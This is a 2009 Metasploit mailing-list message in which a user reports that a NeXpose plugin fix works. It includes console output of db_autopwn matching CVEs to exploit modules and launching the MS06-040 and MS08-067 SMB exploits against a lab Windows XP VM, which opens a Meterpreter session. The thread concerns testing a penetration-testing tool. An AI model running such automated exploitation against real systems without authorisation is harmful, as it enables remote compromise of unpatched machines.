Metasploit mailing list archives

Previous By Date Next
Previous By Thread Next

Re: db_autopwn & NeXpose

From: John Sawyer <jsawyer () ufl edu>
Date: Thu, 3 Dec 2009 11:22:17 -0500
On Dec 2, 2009, at 8:36 PM, HD Moore wrote:


On Wed, 2009-12-02 at 16:28 -0500, John Sawyer wrote:

Great work on the new updates. I took the NeXpose plugin for a test
drive today and everything seems to be working as expected except that 
db_autopwn is not mapping the CVE-2006-3439 vulnerability to the
exploit for MS06-040. I have a VM with Windows XP SP2 that is
definitely vulnerable. I confirmed it is vulnerable by exploiting it.

Is there something I'm missing or is there a CVE name mismatch when
PWN_XREF does the lookup?


All fixed, svn update :-)

This update also improves db_autopwn usability quite a bit.
HD, you're the man! I saw you made multiple changes (nexpose.rb & db.rb) since your e-mail last night and this morning. Around 1am, I got the first chunk of output below, and this morning after another update, I get even more accurate results.
I know I probably shouldn't use the autopwn at the end since it is trying both exploits, but it's there so I couldn't help myself. It worked without a problem. Very sweet! 

Your turnaround time is amazing. Keep up the awesome work.

-jhs



msf > db_autopwn -t -x
[*] Analysis completed in 3 seconds (3 vulns / 1761 refs)
[*] = = = = = = = = ======================================================================== 
[*]                             Matching Exploit Modules
[*] = = = = = = = = ======================================================================== [*] 172.16.1.163:445 exploit/windows/smb/ms06_040_netapi (CVE-2006-3439) [*] = = = = = = = = ======================================================================== 
[*]
[*]



msf >db_autopwn -e -r -t -x
[*] Analysis completed in 3 seconds (4 vulns / 1763 refs)
[*]
[*] = = = = = = = = ======================================================================== 
[*]                             Matching Exploit Modules
[*] = = = = = = = = ======================================================================== [*] 172.16.1.163:445 exploit/windows/smb/ms06_040_netapi (CVE-2006-3439) [*] 172.16.1.163:445 exploit/windows/smb/ms08_067_netapi (NEXPOSE- dcerpc-ms-netapi-netpathcanonicalize-dos) [*] = = = = = = = = ======================================================================== 
[*]
[*]
[*] (1/2 [0 sessions]): Launching exploit/windows/smb/ms06_040_netapi against 172.16.1.163:445... [*] (2/2 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 172.16.1.163:445... [*] (2/2 [0 sessions]): Waiting on 2 launched modules to finish execution... [*] Meterpreter session 1 opened (192.168.1.12:31783 -> 172.16.1.163:1036) 
[*] The autopwn command has completed with 1 sessions
[*] Enter sessions -i [ID] to interact with a given session ID
[*]
[*] = = = = = = = = ======================================================================== 

Active sessions
===============

  Id  Description  Tunnel                                       Via
  --  -----------  ------                                       ---
1 Meterpreter 192.168.1.12:31783 -> 172.16.1.163:1036 windows/ smb/ms08_067_netapi
[*] = = = = = = = = ======================================================================== 
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
Previous By Date Next
Previous By Thread Next

Current thread: